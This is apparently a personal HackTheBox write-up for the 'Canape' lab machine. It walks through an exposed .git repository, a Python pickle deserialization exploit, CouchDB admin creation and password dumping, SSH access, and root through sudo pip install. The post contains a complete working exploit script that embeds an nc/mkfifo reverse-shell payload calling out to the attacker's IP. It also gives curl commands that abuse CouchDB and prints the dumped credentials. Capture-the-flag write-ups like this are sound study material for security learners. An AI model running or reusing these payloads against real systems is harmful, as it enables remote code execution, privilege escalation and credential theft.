HackTheBox Writeup — Canape

Hello Guys , I am Faisal Husaini and this is my first writeup on Medium and also the first writeup in any platform on the web. My username on HTB is “faisalelino” .
This writeup is on Canape box which is one of the hardest box on HTB. But the experience was great while solving this machine as I learned about alot of stuffs while solving this machine.
The IP for this machine is 10.10.10.70 , so let’s get started
NMAP Results

We see that port 80 is open running Apache httpd 2.4.18 .Also if you notice in the results , we can see that there is a /git directory in the web server , lets see what does it contain
/.git
So we access 10.10.10.70/.git in the browser , we get

There is a directory listing and also a “config” file in it , lets see what does it contain

We see it has a “url=http://git.canape.htb/simpsons.git” , so let’s clone the file , but before that , we have to add “canape.htb” and “git.canape.htb” to our host file like this

Now lets clone the file from the url we got..

We got the simpsons folder containing some files , lets see the files in it

We see it has a __init__.py file containing some code , but the main thing to point out is the cPickle module imported , which means that there might be a Pickle Injection Vulnerability , lets dig further more
Pickle Injection Vulnerability
As we came to know that it might have a pickle injection vulnerability , so I referred to a blog to learn more about it as I was not much aware of this vulnerability
We need to create a python script exploit to trigger the vulnerability
import os
import cPickle
from hashlib import md5
import requests# Exploit that we want the target to unpickle
class Exploit(object):
def __reduce__(self):
return (os.system, (‘homer;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.89 1234 >/tmp/f’,))shellcode = cPickle.dumps(Exploit())
print shellcode + “\n”
print md5(shellcode).hexdigest()part1 = str(shellcode.split(“;”)[0])
part2 = str(“;”+shellcode.split(“;”)[1])
part3 = str(“;”+shellcode.split(“;”)[2])
part4 = str(“;”+shellcode.split(“;”)[3])r = requests.post(“http://10.10.10.70/submit", data={‘character’: str(part1), ‘quote’:str(part2 + part3 + part4)})
print(r.status_code, r.reason, r.text)
r2 = requests.post(“http://10.10.10.70/check", data={‘id’: md5(shellcode).hexdigest()})
print(r2.status_code, r2.reason, r2.text)
Please do the give the gaps after the class and functions as medium isn’t supporting tabs
So after getting everything ready , we set up a netcat listener on port 1234 as I gave that port to get the reverse connection on the python-exploit.py script , so now lets the exploit

Cool! We got a reverse connection , now lets further dig it up
As we got the shell , lets get a tty using python

CouchDB Privelege Escalation
As we are www-data , so we cant get access to the user “Homer” on this box.
Let’s run “ps aux | grep homer” , and see what processes are running from the Homer user

We can see that it is running couchdb , so lets search for Couchdb exploit or privilege escalation methods
Here we use curl commands to create a admin user in the couchdb database and also get the complete user and password from it
curl -X PUT ‘http://127.0.0.1:5984/_users/org.couchdb.user:faisal' — data-binary ‘{“type”:”user”,”name”:”faisal”,”roles”:[“_admin”],”roles”:[],”password”:”toor”}’

We have successfully created a user in the db , to confirm we use the below command
curl -X GET ‘http://faisal:toor@127.0.0.1:5984/_users/_all_docs'

Here we confirm that the user we created for the db has successfully being created
Now we dump the username and password from the db using the below command:
curl -X GET ‘http://faisal:toor@127.0.0.1:5984/passwords/_all_docs?include_docs=true'

From the dumped data , we can see that there is password for the user “homer” which is “h02ddjdj2k2k2”
Let’s try to connect to the user using “su homer” and then providing the password

It fails , hmmm , also we see that there was only port 80 open from the nmap scan we did … but the dump also has a password for ssh, i.e , “0B4jyA0xtytZi7esBNGp”, with no user given.
Maybe it is the ssh password for the user “homer”, but we see no SSH Port open from the normal nmap scan we did before , so lets try the full nmap scan using the command below:
nmap -sV -sC 10.10.10.70 -p- — min-rate 1000

We see that there one more port open , i.e , 65535 , which for me was a complete troll to me :P as I was hitting my head so get connected to “homer” user
Lets try connecting to the user “homer” through ssh
SSH Connection
We try to connect to ssh using the command below:
ssh homer@10.10.10.70 -p 65535
Password: 0B4jyA0xtytZi7esBNGp

Bingo! We got in , lets now dig into it and get the user flag and root flag (which still requires a full privilege escalation for root flag)

When we type the “sudo -l” command , we get that we can use sudo with /usr/bin/pip install *
So lets exploit it using that , but first we create a python script so that we can get a reverse shell back to us when we pip install , after we set up a netcat listener to get the reverse shell back

Here is our code ready and now lets do the exploitation part
We use the following command:
sudo /usr/bin/pip install . — upgrade — force-reinstall
Also set up a nc listener on our host machine

All set , now time to exploit

Voila!! We got root , now time to get both of the flags…!
Getting User Flag
The user flag is in the home directory of user “homer”

We got the user flag
Getting Root Flag
The root flag is under the /root directory

We got the root.flag as well
Vulnerabilities Used To Exploit This Box
Vulnerabilities in the box as follows :-
1) Python Pickle Injection → To get RCE and get a low privilege shell
2) CouchDB →To get user privileges from www-data
3) Running sudo as /usr/bin/pip install * → To get root access
References
Below are the links which helped me solving the box:-
Python Pickle Injection :
→ https://blog.nelhage.com/2011/03/exploiting-pickle/
→ https://lincolnloop.com/blog/playing-pickle-security/
CouchDB Exploitation :
→ https://justi.cz/security/2017/11/14/couchdb-rce-npm.html
→ https://wiki.apache.org/couchdb/How_to_create_users_via_script